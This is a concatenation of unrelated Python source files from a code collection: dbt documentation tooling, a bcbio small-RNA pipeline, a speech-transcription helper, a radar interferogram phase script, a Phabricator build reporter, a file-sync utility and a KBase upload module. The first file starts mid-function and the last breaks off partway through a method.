                    yaml_file_models = src
        else:
            KEY = "models"
            yaml_file_models = yaml_file
        if yaml_file_models is None:
            return noop
        for yaml_file_model_section in yaml_file_models[KEY]:
            if yaml_file_model_section["name"] == node.name:
                logger().info(":microscope: Looking for actions")
                n_cols_added = self.add_missing_cols_to_node_and_model(
                    missing_columns, node, yaml_file_model_section
                )
                n_cols_doc_inherited = self.update_undocumented_columns_with_prior_knowledge(
                    undocumented_columns, node, yaml_file_model_section
                )
                n_cols_removed = self.remove_columns_not_in_database(
                    extra_columns, node, yaml_file_model_section
                )
                return n_cols_added, n_cols_doc_inherited, n_cols_removed
        logger().info(":thumbs_up: No actions needed")
        return noop
def get_raw_profiles(profiles_dir: Optional[str] = None) -> Dict[str, Any]:
    """Load the raw profiles.yml mapping via dbt's profile reader."""
    # Imported lazily so importing this module does not require profile machinery.
    import dbt.config.profile as dbt_profile
    return dbt_profile.read_profile(profiles_dir or DEFAULT_PROFILES_DIR)
def uncompile_node(node: ManifestNode) -> ManifestNode:
    """Return a fresh ParsedModelNode rebuilt from the node's serialized dict.

    NOTE(review): the round-trip through ParsedModelNode is presumably what
    drops compiled-only attributes -- confirm against the dbt contracts API.
    """
    return ParsedModelNode.from_dict(node.to_dict())
| StarcoderdataPython |
8187524 | import os
import string
import os.path as op
import sys
import shutil
from collections import namedtuple
try:
from seqcluster import prepare_data as prepare
from seqcluster import templates as template_seqcluster
from seqcluster.seqbuster import _create_counts, _read_miraligner, _tab_output
except ImportError:
pass
from bcbio.utils import file_exists, safe_makedir, move_safe, append_stem, get_bcbio_bin
from bcbio.provenance import do
from bcbio.distributed.transaction import file_transaction
from bcbio.log import logger
from bcbio.pipeline import datadict as dd
from bcbio.pipeline.sample import process_alignment
from bcbio.srna import mirdeep
from bcbio.rnaseq import spikein
from bcbio.srna import mirge
def run_prepare(*data):
    """
    Run seqcluster prepare to merge all samples in one file.

    Writes seqs.ma / seqs.fastq under <work>/seqcluster/prepare and records
    their paths on every sample dict.
    """
    out_dir = os.path.join(dd.get_work_dir(data[0][0]), "seqcluster", "prepare")
    out_dir = os.path.abspath(safe_makedir(out_dir))
    # NOTE(review): prepare_dir is computed but never used below -- verify intent.
    prepare_dir = os.path.join(out_dir, "prepare")
    tools = dd.get_expression_caller(data[0][0])
    if len(tools) == 0:
        logger.info("You didn't specify any other expression caller tool."
                    "You can add to the YAML file:"
                    "expression_caller:[trna, seqcluster, mirdeep2]")
    # One "<collapsed fastq>\t<sample name>" line per sample, seqcluster's input format.
    fn = []
    for sample in data:
        name = sample[0]["rgnames"]['sample']
        fn.append("%s\t%s" % (sample[0]['collapse'], name))
    # seqcluster expects an argparse-like namespace; build one via namedtuple.
    args = namedtuple('args', 'debug print_debug minc minl maxl out')
    args = args(False, False, 2, 17, 40, out_dir)
    ma_out = op.join(out_dir, "seqs.ma")
    seq_out = op.join(out_dir, "seqs.fastq")
    # Require each sequence in at least 10% of samples (minimum of 1).
    min_shared = max(int(len(fn) / 10.0), 1)
    if not file_exists(ma_out):
        seq_l, sample_l = prepare._read_fastq_files(fn, args)
        with file_transaction(ma_out) as ma_tx:
            with open(ma_tx, 'w') as ma_handle:
                with open(seq_out, 'w') as seq_handle:
                    logger.info("Prepare seqs.fastq with -minl 17 -maxl 40 -minc 2 --min_shared 0.1")
                    prepare._create_matrix_uniq_seq(sample_l, seq_l, ma_handle, seq_handle, min_shared)
    for sample in data:
        sample[0]["seqcluster_prepare_ma"] = ma_out
        sample[0]["seqcluster_prepare_fastq"] = seq_out
    return data
def run_align(*data):
    """
    Prepare data to run alignment step, only once for each project.

    Aligns the merged seqs.fastq, relocates the resulting BAM to
    <work>/align/seqs.bam, and stores it on every sample as "cluster_bam".
    """
    work_dir = dd.get_work_dir(data[0][0])
    out_dir = op.join(work_dir, "seqcluster", "prepare")
    seq_out = op.join(out_dir, "seqs.fastq")
    bam_dir = op.join(work_dir, "align")
    new_bam_file = op.join(bam_dir, "seqs.bam")
    tools = dd.get_expression_caller(data[0][0])
    if not file_exists(new_bam_file):
        # Align once using the first sample's configuration, then move the
        # BAM (and index) to the shared location and drop the per-sample dir.
        sample = process_alignment(data[0][0], [seq_out, None])
        bam_file = dd.get_work_bam(sample[0][0])
        shutil.move(bam_file, new_bam_file)
        shutil.move(bam_file + ".bai", new_bam_file + ".bai")
        shutil.rmtree(op.join(bam_dir, sample[0][0]["rgnames"]['sample']))
    for sample in data:
        # sample[0]["align_bam"] = sample[0]["clean_fastq"]
        sample[0]["cluster_bam"] = new_bam_file
    if "mirdeep2" in tools:
        # NOTE(review): return value unused; presumably run for its side
        # effects (novel miRNA db on disk) -- confirm.
        novel_db = mirdeep.run(data)
    return data
def run_cluster(*data):
    """
    Run seqcluster cluster to detect smallRNA clusters.

    Also aggregates miraligner/mirge outputs into count matrices and attaches
    the results to the first sample (mutated in place).
    """
    sample = data[0][0]
    tools = dd.get_expression_caller(data[0][0])
    work_dir = dd.get_work_dir(sample)
    out_dir = op.join(work_dir, "seqcluster", "cluster")
    out_dir = op.abspath(safe_makedir(out_dir))
    prepare_dir = op.join(work_dir, "seqcluster", "prepare")
    bam_file = data[0][0]["cluster_bam"]
    if "seqcluster" in tools:
        # Prefer an explicit transcriptome GTF; fall back to the srna GTF.
        gtf_file = dd.get_transcriptome_gtf(sample) if dd.get_transcriptome_gtf(sample) else dd.get_srna_gtf_file(sample)
        sample["seqcluster"] = _cluster(bam_file, data[0][0]["seqcluster_prepare_ma"],
                                        out_dir, dd.get_ref_file(sample),
                                        gtf_file)
        sample["report"] = _report(sample, dd.get_ref_file(sample))
    if "mirge" in tools:
        sample["mirge"] = mirge.run(data)
    # Known miRNA counts (mirbase) and, when mirdeep2 ran, novel miRNA counts.
    out_mirna = _make_isomir_counts(data, out_dir=op.join(work_dir, "mirbase"))
    if out_mirna:
        sample = dd.set_mirna_counts(sample, out_mirna[0])
        sample = dd.set_isomir_counts(sample, out_mirna[1])
    out_novel = _make_isomir_counts(data, "seqbuster_novel", op.join(work_dir, "mirdeep2"), "_novel")
    if out_novel:
        sample = dd.set_novel_mirna_counts(sample, out_novel[0])
        sample = dd.set_novel_isomir_counts(sample, out_novel[1])
    data[0][0] = sample
    data = spikein.combine_spikein(data)
    return data
def _cluster(bam_file, ma_file, out_dir, reference, annotation_file=None):
    """
    Connect to seqcluster to run cluster with python directly.

    Invokes the `seqcluster cluster` CLI (skipped when counts.tsv already
    exists) and returns the paths of its main outputs.
    """
    seqcluster = op.join(get_bcbio_bin(), "seqcluster")
    # cl = ["cluster", "-o", out_dir, "-m", ma_file, "-a", bam_file, "-r", reference]
    if annotation_file:
        annotation_file = "-g " + annotation_file
    else:
        annotation_file = ""
    if not file_exists(op.join(out_dir, "counts.tsv")):
        cmd = ("{seqcluster} cluster -o {out_dir} -m {ma_file} -a {bam_file} -r {reference} {annotation_file}")
        do.run(cmd.format(**locals()), "Running seqcluster.")
    counts = op.join(out_dir, "counts.tsv")
    stats = op.join(out_dir, "read_stats.tsv")
    json = op.join(out_dir, "seqcluster.json")
    return {'out_dir': out_dir, 'count_file': counts, 'stat_file': stats, 'json': json}
def _report(data, reference):
    """
    Run report of seqcluster to get browser options for results.

    Produces <work>/seqcluster/report/seqcluster.db (skipped if present).
    """
    seqcluster = op.join(get_bcbio_bin(), "seqcluster")
    work_dir = dd.get_work_dir(data)
    out_dir = safe_makedir(os.path.join(work_dir, "seqcluster", "report"))
    out_file = op.join(out_dir, "seqcluster.db")
    json = op.join(work_dir, "seqcluster", "cluster", "seqcluster.json")
    cmd = ("{seqcluster} report -o {out_dir} -r {reference} -j {json}")
    if not file_exists(out_file):
        do.run(cmd.format(**locals()), "Run report on clusters")
    return out_file
def report(data):
    """Create a Rmd report for small RNAseq analysis

    Writes summary.csv (sample_id plus metadata factor columns) into
    <work>/report and renders the Rmd template there.

    :param data: list of bcbio sample tuples
    :return: path to the written summary.csv
    """
    work_dir = dd.get_work_dir(data[0][0])
    out_dir = op.join(work_dir, "report")
    safe_makedir(out_dir)
    summary_file = op.join(out_dir, "summary.csv")
    with file_transaction(summary_file) as out_tx:
        with open(out_tx, 'w') as out_handle:
            print >>out_handle, "sample_id,%s" % _guess_header(data[0][0])
            for sample in data:
                info = sample[0]
                group = _guess_group(info)
                # NOTE(review): removed the unused "seqbuster" lookup that
                # was assigned but never written to the CSV.
                print >>out_handle, ",".join([dd.get_sample_name(info),
                                              group])
    _modify_report(work_dir, out_dir)
    return summary_file
def _guess_header(info):
"""Add the first group to get report with some factor"""
value = "group"
if "metadata" in info:
if info["metadata"]:
return ",".join(map(str, info["metadata"].keys()))
return value
def _guess_group(info):
"""Add the first group to get report with some factor"""
value = "fake"
if "metadata" in info:
if info["metadata"]:
return ",".join(map(str, info["metadata"].values()))
return value
def _modify_report(summary_path, out_dir):
    """Read Rmd template and dump with project path.

    :param summary_path: directory substituted into the template's
        ``path_abs`` placeholder.
        NOTE(review): the only caller passes the *work* directory here, not
        the summary CSV path the name suggests -- confirm intended value.
    :param out_dir: directory where the rendered srna_report.rmd is written
    :return: path to the rendered Rmd file
    """
    summary_path = op.abspath(summary_path)
    # The template ships alongside the seqcluster package resources.
    template = op.normpath(op.join(op.dirname(op.realpath(template_seqcluster.__file__)), "report.rmd"))
    content = open(template).read()
    # safe_substitute leaves any unknown $placeholders untouched.
    out_content = string.Template(content).safe_substitute({'path_abs': summary_path})
    out_file = op.join(out_dir, "srna_report.rmd")
    with open(out_file, 'w') as out_handle:
        print >>out_handle, out_content
    return out_file
def _make_isomir_counts(data, srna_type="seqbuster", out_dir=None, stem=""):
    """
    Parse miraligner files to create count matrix.

    :param data: list of bcbio sample tuples
    :param srna_type: sample key holding the miraligner output file
    :param out_dir: output directory (defaults to <work>/mirbase)
    :param stem: suffix appended to the count file names (e.g. "_novel")
    :return: [mirna_counts, isomir_counts] paths, or None (implicit
        fall-through) when no sample had usable miRNA annotations
    """
    work_dir = dd.get_work_dir(data[0][0])
    if not out_dir:
        out_dir = op.join(work_dir, "mirbase")
    out_novel_isomir = append_stem(op.join(out_dir, "counts.tsv"), stem)
    out_novel_mirna = append_stem(op.join(out_dir, "counts_mirna.tsv"), stem)
    logger.debug("Create %s count data at %s." % (srna_type, out_dir))
    # The mirna counts file doubles as the "already done" sentinel.
    if file_exists(out_novel_mirna):
        return [out_novel_mirna, out_novel_isomir]
    out_dts = []
    for sample in data:
        if sample[0].get(srna_type):
            miraligner_fn = sample[0][srna_type]
            reads = _read_miraligner(miraligner_fn)
            if reads:
                out_file, dt, dt_pre = _tab_output(reads, miraligner_fn + ".back", dd.get_sample_name(sample[0]))
                out_dts.append(dt)
            else:
                logger.debug("WARNING::%s has NOT miRNA annotated for %s. Check if fasta files is small or species value." % (dd.get_sample_name(sample[0]), srna_type))
    if out_dts:
        out_files = _create_counts(out_dts, out_dir)
        # Move results into the canonical (stemmed) file names.
        out_files = [move_safe(out_files[0], out_novel_isomir), move_safe(out_files[1], out_novel_mirna)]
        return out_files
    else:
        logger.debug("WARNING::any samples have miRNA annotated for %s. Check if fasta files is small or species value." % srna_type)
| StarcoderdataPython |
6478078 | import json
import os
import requests
import struct
import subprocess
import tempfile
import tempfile
import wave
from datetime import datetime
GOOGLE_SPEECH_API_KEY = "<KEY>"
GOOGLE_SPEECH_API_URL = "http://www.google.com/speech-api/v2/recognize" + \
"?client=chromium&lang={lang}&key={key}"
def speech_api_call(data,
                    language="en-US",
                    rate=16000,
                    retries=3,
                    api_key=GOOGLE_SPEECH_API_KEY):
    """POST FLAC-encoded audio to the Google Speech API.

    data: FLAC audio bytes
    language: BCP-47 language tag for recognition
    rate: sample rate advertised in the Content-Type header
    retries: attempts before giving up on connection errors
    Returns the capitalized transcript, or None when nothing was recognized.
    """
    url = GOOGLE_SPEECH_API_URL.format(lang=language, key=api_key)
    headers = {"Content-Type": "audio/x-flac; rate=%d" % rate}
    for _ in range(retries):
        try:
            resp = requests.post(url, data=data, headers=headers)
        except requests.exceptions.ConnectionError:
            continue
        # The API streams one JSON object per line; early lines often carry
        # an empty result, so scan until a transcript is found.
        # (resp.text, not resp.content: content is bytes on Python 3 and
        # cannot be split with a str separator.)
        for line in resp.text.splitlines():
            try:
                parsed = json.loads(line)
                transcript = parsed['result'][0]['alternative'][0]['transcript']
            except (ValueError, KeyError, IndexError):
                # Narrowed from a bare except: only malformed JSON or a
                # missing result structure should be skipped.
                continue
            return transcript.capitalize()
    return None
def wav2flac(source_path):
    """Convert a WAV file to 16 kHz mono FLAC and return the encoded bytes.

    Requires the ffmpeg binary on PATH.
    """
    # delete-on-close temp file: the bytes are read back before returning,
    # and the file is reclaimed when `temp` is garbage-collected.
    temp = tempfile.NamedTemporaryFile(suffix='.flac')
    # NOTE(review): ffmpeg writes to temp.name while this handle is open;
    # that works on POSIX but would hit file locking on Windows -- confirm
    # the deployment platform.
    command = ["ffmpeg", "-y", "-i", source_path,
               "-ac", "1", "-ar", "16000",
               "-loglevel", "error", temp.name]
    subprocess.check_output(command)
    return temp.read()
def write_wav(frames, sample_width, rate=16000, channels=1):
    """Write signed 16-bit PCM *frames* to a temporary WAV file.

    frames: iterable of signed 16-bit integer samples
    sample_width: bytes-per-sample recorded in the WAV header
    rate / channels: WAV header parameters
    Returns the path to the file; the caller is responsible for removing it.
    """
    # '<' + n*'h': little-endian signed 16-bit samples.
    data = struct.pack('<' + ('h' * len(frames)), *frames)
    tmp = tempfile.NamedTemporaryFile(suffix='.wav', delete=False)
    tmp.close()  # close our handle (was leaked); wave reopens the path below
    wf = wave.open(tmp.name, 'wb')
    try:
        wf.setnchannels(channels)
        wf.setsampwidth(sample_width)
        wf.setframerate(rate)
        wf.writeframes(data)
    finally:
        wf.close()  # guarantee the header is finalized even on error
    return tmp.name
def transcribe(data, sample_width, rate):
    """Dump frames to a temp WAV, convert to FLAC, and query the speech API.

    Returns the transcript string (or None when recognition fails); the
    intermediate WAV file is removed before returning.
    """
    wav_path = write_wav(data, sample_width, rate=rate)
    flac_bytes = wav2flac(wav_path)
    text = speech_api_call(flac_bytes)
    os.remove(wav_path)
    return text
def transcriber_thread(in_q, out_q, rate=44100):
    """Consume (frames, sample_width) tuples from in_q, transcribe each
    chunk, and push non-empty transcripts (with a printed timestamp) to
    out_q.

    Runs until interrupted (KeyboardInterrupt) or the queue's other end is
    torn down (EOFError, e.g. for multiprocessing queues).
    """
    try:
        while True:
            frames, width = in_q.get()
            result = transcribe(frames, width, rate)
            if result:
                timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
                print('[{0}] {1}'.format(timestamp, result))
                out_q.put(result)
    except KeyboardInterrupt:
        pass
    except EOFError:
        pass
| StarcoderdataPython |
9655174 | #!/usr/bin/python
# Convert an unwrapped interferogram's phase band into line-of-sight
# displacement (cm) and write it back out as raw float32.
import numpy
import scipy  # retained: historic import (original used scipy.matrix)
import subprocess

# Input stem and geometry of the unwrapped interferogram.
radarld = "radar_ODR_5rlks"
width = "1122"  # samples per line in the .phs band
# Radians -> centimeters scale: 100 cm/m * 0.0565646 m wavelength.
wavelength = 100.0 * 0.0565646

# Split the RMG-format .unw file into magnitude and phase bands.
cmd = "\nrmg2mag_phs " + radarld + ".unw " + radarld + ".mag " + radarld + ".phs " + width + "\n"
subprocess.call(cmd, shell=True)

# Read the raw float32 phase band (with-statement replaces the manual
# open/close on a variable that shadowed the `file` builtin).
# NOTE(review): the original reshaped to (width, -1); confirm the intended
# row/column orientation before relying on it.
with open(radarld + ".phs", "rb") as phs_file:
    phs = numpy.fromfile(phs_file, numpy.float32, -1).reshape(int(width), -1)

# Phase (radians) -> displacement: phi * lambda / (4*pi).
phs = phs * wavelength / 4 / numpy.pi
# scipy.matrix / scipy.float32 were numpy aliases removed from modern SciPy;
# a plain float32 ndarray writes byte-identical output with tofile().
phs = numpy.asarray(phs, dtype=numpy.float32)
phs.tofile("adj_" + radarld + ".phs")
| StarcoderdataPython |
8079066 | #!/usr/bin/env python
#
# Copyright (c) 2017-2018 The Bitcoin ABC developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Desciption:
# Quick and dirty script to read build output and report it to phabricator.
import sys
import os
import os.path
import urlparse
import json
from phabricator import Phabricator
import pygit2
from junitparser import TestCase, TestSuite, JUnitXml, Skipped, Error, Failure
def get_arcconfig():
    """Locate the repository root and parse its .arcconfig JSON file.

    Returns the parsed configuration dict; raises AssertionError when the
    file is missing.
    """
    # Find the .git dir
    repoRoot = pygit2.discover_repository(".")
    # .arcconfig lives in the working tree root, one level above .git.
    arcconfig_path = os.path.normpath(os.path.join(repoRoot, "../.arcconfig"))
    assert os.path.isfile(arcconfig_path), ".arcconfig not found"
    with open(arcconfig_path, "r") as f:
        return json.load(f)  # parse straight from the handle
def get_failures(junitfile):
    """Return a map of failures from a given junit report

    Keys are "<test name>.<class name>"; values are the concatenated
    failure messages for that test case.
    """
    ts = JUnitXml.fromfile(junitfile)
    failures = {}
    for case in ts:
        failure_texts = []
        # NOTE(review): reaches into junitparser's private _elem for the raw
        # failure text -- may break across junitparser versions.
        for failure in case.iterchildren(Failure):
            failure_texts.append(failure._elem.text.strip())
        if len(failure_texts) != 0:
            key = "{}.{}".format(case.name, case.classname)
            failures[key] = "\n".join(failure_texts)
    return failures
def get_commit_message():
    """Return the message of the commit currently checked out (HEAD)."""
    repo_path = pygit2.discover_repository(".")
    repo = pygit2.Repository(repo_path)
    return repo.head.peel().message
def get_revision(phab, commit_message):
    """Return a phabricator `revisionID` parsed from the given commit body."""
    parsed = phab.differential.parsecommitmessage(corpus=commit_message)
    return parsed.fields['revisionID']
def get_author(phab, revisionID):
    """Look up the author PHID of the given Differential revision."""
    matches = phab.differential.revision.search(
        constraints={"ids": [revisionID]}).data
    assert len(matches) == 1, "Phabricator returned too many revisions"
    return matches[0]['fields']['authorPHID']
def create_task_body(buildUrl, revisionID, failures):
"""Generate a text body for a new task based on build failures."""
failure_blocks = []
# TODO: Fix this templating mess.
for failure, message in failures.iteritems():
failure_blocks.append("""{failure}
```
{message}
```
""".format(failure=failure, message=message))
if len(failure_blocks) == 0:
failure_blocks.append("See build log.")
task_body = """A [[ {url} | build ]] related to D{revision} has failed for the following reasons:
{reasons}
""".format(url=buildUrl, revision=revisionID, reasons="\n".join(failure_blocks))
return task_body
def create_task(phab, guiltyPHID, revisionID, task_body):
    """File an "unbreak now" Maniphest task assigned to the revision author.

    guiltyPHID: PHID of the user to own the task
    task_body: fully rendered description from create_task_body()
    """
    phab.maniphest.edit(transactions=[
        {"type": "owner", "value": guiltyPHID},
        {"type": "title", "value": "Revision D{} broke builds".format(
            revisionID)},
        {"type": "priority", "value": "unbreak"},
        # task_body is already fully rendered; calling .format() on it again
        # (as the original did) would raise on any literal braces that appear
        # in captured failure output, so pass it through verbatim.
        {"type": "description", "value": task_body}
    ])
def create_comment(phab, revisionID, build_status, buildUrl):
    """Post a pass/fail testing comment on the given Differential revision."""
    status_verb = "passed" if build_status == "success" else "failed"
    if buildUrl:
        msg = "This revision has {} [[{} | testing]].".format(
            status_verb, buildUrl)
    else:
        msg = "This revision has {} testing.".format(status_verb)
    phab.differential.revision.edit(transactions=[
        {"type": "comment", "value": msg}
    ], objectIdentifier=revisionID)
def main(args):
    """Read build status/junit files given on the command line and report
    the outcome to Phabricator (comment + unbreak-now task on failure).

    args: full argv; args[0] is the script name, so at least one report
    path is required.
    """
    if len(args) < 2:
        print("Please provide a list of junit reports as command line arguments.")
        sys.exit(1)
    token = os.getenv("TEAMCITY_CONDUIT_TOKEN", None)
    if not token:
        # NOTE(review): adjacent string literals concatenate here, so the
        # printed message has no quotes around the variable name -- confirm
        # whether literal quotes were intended.
        print("Please provide a conduit token in the environment variable ""TEAMCITY_CONDUIT_TOKEN""")
        sys.exit(1)
    arcconfig = get_arcconfig()
    phabricatorUrl = urlparse.urljoin(arcconfig['conduit_uri'], "api/")
    buildUrl = os.getenv('BUILD_URL', '')
    build_status = "success"
    failures = {}
    for arg in args:
        # All inputs may not exist if the build fails prematurely
        if not os.path.isfile(arg):
            continue
        if arg.endswith(".status"):
            # A .status file carries the overall build verdict as plain text.
            with open(arg, "r") as f:
                build_status = f.read().strip()
        elif arg.endswith(".xml"):
            failures.update(get_failures(arg))
    # Any junit failure overrides a "success" status file.
    if len(failures) != 0:
        build_status = "failure"
    phab = Phabricator(host=phabricatorUrl, token=token)
    phab.update_interfaces()
    revisionID = get_revision(phab, get_commit_message())
    authorPHID = get_author(phab, revisionID)
    if build_status != "success":
        task_body = create_task_body(buildUrl, revisionID, failures)
        create_task(phab, authorPHID, revisionID, task_body)
    create_comment(phab, revisionID, build_status, buildUrl)
if __name__ == "__main__":
    main(sys.argv)
| StarcoderdataPython |
3590145 | <reponame>shimataro/syncfiles
#!/usr/bin/python
# coding: utf-8
""" Synchronize files
* Copy from newest file to others.
* Error when all files are not exist.
"""
import sys
import os
def main(scriptname, args):
    """Entry point: require at least two file arguments, then synchronize.

    @param scriptname: script file name (used for the usage message)
    @param args: command line arguments (the files to synchronize)
    @return: exit status
    """
    if len(args) >= 2:
        return syncfiles(args)
    usage(scriptname)
    return os.EX_USAGE
def usage(scriptname):
    """Print a usage line for this script to stderr.

    @param scriptname: script file name
    """
    message = "Usage: {0} <file> <file> [<file> ...]".format(
        os.path.basename(scriptname))
    print3(message, file=sys.stderr)
def syncfiles(filenames):
    """Copy the newest (last-modified) file over every differing sibling.

    @param filenames: list of filenames to be synchronized
    @return: exit status (os.EX_NOINPUT when no file exists)
    """
    # The newest existing file becomes the master copy.
    master = get_newest_filename(filenames)
    if master is None:
        print3("Error: No files exist", file=sys.stderr)
        return os.EX_NOINPUT
    print3("Master file: {0}".format(master))
    for name in filenames:
        if not file_same_contents(master, name):
            file_copy(master, name)
    return os.EX_OK
def get_newest_filename(filenames):
    """Return the most recently modified existing file, or None.

    Missing or unreadable files are skipped; on an mtime tie the earlier
    entry in the list wins.
    """
    best_name, best_mtime = None, -1
    for name in filenames:
        try:
            mtime = os.path.getmtime(name)
        except OSError:
            continue  # nonexistent files simply don't compete
        if mtime > best_mtime:
            best_name, best_mtime = name, mtime
    return best_name
def file_same_contents(filename1, filename2):
    """Report whether the two paths name equal content.

    @param filename1: filename 1
    @param filename2: filename 2
    @return: True when equal; False when they differ or either is missing
    """
    import filecmp
    if filename1 == filename2:
        return True  # identical path: trivially equal, no I/O needed
    try:
        return filecmp.cmp(filename1, filename2)
    except OSError:
        return False  # one of the files is missing or unreadable
def file_copy(filename_src, filename_dst):
    """Overwrite *filename_dst* with *filename_src* and log the copy.

    @param filename_src: source filename
    @param filename_dst: destination filename
    """
    import shutil
    shutil.copy(filename_src, filename_dst)
    print3("Copied: {0} -> {1}".format(filename_src, filename_dst))
def print3(*objects, **params):
    """Python-3-style print shim for Python 2.

    @param objects: output objects (str()-converted)
    @param sep: separator string (default " ")
    @param end: terminator string (default newline)
    @param file: output stream (default sys.stdout)
    """
    sep = params.get("sep", " ")
    end = params.get("end", "\n")
    out = params.get("file", sys.stdout)  # local renamed: don't shadow file()
    out.write(sep.join(str(obj) for obj in objects) + end)
if __name__ == "__main__":
    # Delegate to main() and propagate its exit status to the shell.
    sys.exit(main(sys.argv[0], sys.argv[1:]))
| StarcoderdataPython |
8015987 | <reponame>alex-dsouza777/Python-Basics
#pip install virtualenv --> Installs the package
#virtualenv myprojectenv --> Creates a new venv
#.\myprojectenv\Scripts\activate.ps1
#pip freeze > requirements.txt --> Creates requirements. txt
#pip install -r requirements.txt --> Installs all packages from requirements.txt
import flask
import pandas as pd
import pygame | StarcoderdataPython |
49887 | <gh_stars>0
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import logging
import os
import shutil
from Utils.mutantpooluploadUtilClient import mutantpooluploadUtil
from Utils.expsfileuploadUtilClient import expsfileuploadUtil
from Utils.barcodecountuploadUtilClient import barcodecountfileuploadUtil
from Utils.genetableuploadUtilClient import genetableuploadUtil
from Utils.fitnessmatrixuploadUtilClient import fitnessmatrixuploadUtil
from Utils.modeluploadUtilClient import modeluploadUtil
#from Utils.funcs import check_output_name
from installed_clients.KBaseReportClient import KBaseReport
from installed_clients.WorkspaceClient import Workspace
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.rbts_genome_to_genetableClient import rbts_genome_to_genetable
#END_HEADER
class poolfileupload:
    '''
    Module Name:
    poolfileupload

    Module Description:
    A KBase module: poolfileupload
    '''

    ######## WARNING FOR GEVENT USERS ####### noqa
    # Since asynchronous IO can lead to methods - even the same method -
    # interrupting each other, you must be *very* careful when using global
    # state. A method could easily clobber the state set by another while
    # the latter method is running.
    ######################################### noqa
    VERSION = "0.0.1"
    GIT_URL = ""
    GIT_COMMIT_HASH = ""

    #BEGIN_CLASS_HEADER
    #END_CLASS_HEADER

    # config contains contents of config file in a hash or None if it couldn't
    # be found
    def __init__(self, config):
        #BEGIN_CONSTRUCTOR
        # Callback URL is injected into the environment by the KBase
        # execution engine; scratch is shared working space for subjobs.
        self.callback_url = os.environ['SDK_CALLBACK_URL']
        self.shared_folder = config['scratch']
        self.ws_url = config['workspace-url']
        logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',
                            level=logging.INFO)
        #END_CONSTRUCTOR
        pass

    def run_poolfileupload(self, ctx, params):
        """
        This example function accepts any number of parameters and returns results in a KBaseReport
        :param params: instance of mapping from String to unspecified object
            'workspace_name' (str):,
            'workspace_id' (int): e.g. 62550,
            'genome_ref' (str): 'A/B/C'
            'pool_file_type' (str): 'genes_table' or 'mutantpool' or 'barcodecount' or 'experiments' or 'model'
            'description' (str): Free string
            'sep_type': 'TSV' or 'CSV'
            'protocol_type': fixed vocab
            'staging_file_names' (list<str>): list<filenames>
            'output_names' list<str>: List<Free string> - Correlate to staging_file_names
        :returns: instance of type "ReportResults" -> structure: parameter
           "report_name" of String, parameter "report_ref" of String
        """
        # ctx is the context object
        # return variables are: output
        #BEGIN run_poolfileupload
        # json is only used in one error message below but was never
        # imported at module level, which made that raise path fail with a
        # NameError; import it locally here.
        import json
        params['shared_folder'] = self.shared_folder
        token = os.environ.get('KB_AUTH_TOKEN', None)
        ws = Workspace(self.ws_url, token=token)
        # get_workspace_info()[0] is the numeric workspace id.
        params['workspace_id'] = ws.get_workspace_info({'workspace': params['workspace_name']})[0]
        params['ws_obj'] = ws
        # genetable object (converts genome to gene table)
        params['gt_obj'] = rbts_genome_to_genetable(self.callback_url)
        params['username'] = ctx['user_id']
        res_dir = os.path.join(self.shared_folder, "results")
        os.mkdir(res_dir)
        params['results_dir'] = res_dir
        #params['output_name'] = check_output_name(params['output_name'])
        # Checking basic params
        if 'sep_type' not in params:
            raise Exception("sep_type not in params.")
        elif params['sep_type'] not in ["TSV", "CSV"]:
            raise Exception(f"Did not recognize sep_type: {params['sep_type']}")
        logging.info(params)
        if 'RBTS_file_type' not in params:
            raise Exception("Did not get param RBTS_file_type")
        else:
            pft = params['RBTS_file_type']
            # Every type except a genes table must reference a genome object.
            if pft in ['experiments', 'mutantpool', 'barcodecount', 'fitness_matrix', 'model']:
                if params['genome_ref'] == "":
                    raise Exception(f"When uploading {pft} files you must reference a genome object.")
                if "organism_scientific_name" in params and params["organism_scientific_name"] != "" and \
                    params["organism_scientific_name"] is not None and \
                    params["organism_scientific_name"] != "None":
                        logging.warning("When uploading anything besides a genes table, "
                                       "do not provide the organism's name (under Advanced Inputs)."
                                        f" Current name given: '{params['organism_scientific_name']}'."
                                        " This new scientific name will not be used.")
                if pft == 'mutantpool':
                    # requires genome_ref
                    pf_util = mutantpooluploadUtil(params)
                    result = pf_util.upload_mutantpool()
                    # The mutant pool upload also produces a genes table file
                    # that is surfaced in the report zip.
                    gene_table_fp = result["GenesTable_fp"]
                    shutil.move(gene_table_fp, res_dir)
                elif pft == 'barcodecount':
                    if "protocol_type" not in params or params["protocol_type"] == "":
                        raise Exception("If uploading a barcodecount file, upload "
                                    "protocol type as well (under Advanced)." + \
                                    json.dumps(params))
                    if "mutantpool_ref" not in params or params["mutantpool_ref"] == "":
                        raise Exception("If uploading barcodecounts files, upload "
                                        "related mutant pool as well (under Advanced).")
                    pcf_util = barcodecountfileuploadUtil(params)
                    result = pcf_util.upload_barcodecountfile()
                elif pft == 'experiments':
                    expsf_util = expsfileuploadUtil(params)
                    result = expsf_util.upload_expsfile()
                elif pft == 'fitness_matrix':
                    # Expects 2-3 staged files in a fixed order: gene fitness
                    # scores, T-scores, and optionally strain fitness scores.
                    num_stage = len(params['staging_file_names'])
                    if not num_stage > 2:
                        raise Exception("When uploading a fitness matrix, "
                                        " upload at least 2 files: the fitness scores "
                                        " and the T-score files. Optionally "
                                        " upload the strain fitness scores file."
                                        " The fitness score TSV file should be "
                                        " the first one, the t-score should be "
                                        " the second, and the strain fitness 3rd. ")
                    elif num_stage > 3:
                        raise Exception("Cannot take more than 3 files for "
                                        "this data type: Gene Fitness, T Scores"
                                        ", and Strain fitness scores.")
                    fitness_matrix_util = fitnessmatrixuploadUtil(params)
                    result = fitness_matrix_util.upload_fitnessmatrix()
                else:
                    # model
                    modelf_util = modeluploadUtil(params)
                    result = modelf_util.upload_model()
            elif pft == "genes_table":
                # Genes tables are the one type that *requires* the organism
                # name in addition to the genome reference.
                if "organism_scientific_name" not in params or params["organism_scientific_name"] == "":
                    raise Exception("When uploading a genes table, you must provide the organism's scientific name (under Advanced Inputs).")
                if "genome_ref" not in params or params["genome_ref"] == "":
                    raise Exception("When uploading a genes table, you must provide a genome object reference (under Advanced).")
                gene_table_util = genetableuploadUtil(params)
                result = gene_table_util.upload_genes_table()
            else:
                raise Exception(f"Did not recognize pool_file_type {pft} for upload")
        # Summarize what was saved; barcodecount returns a list of results,
        # every other type a single result dict.
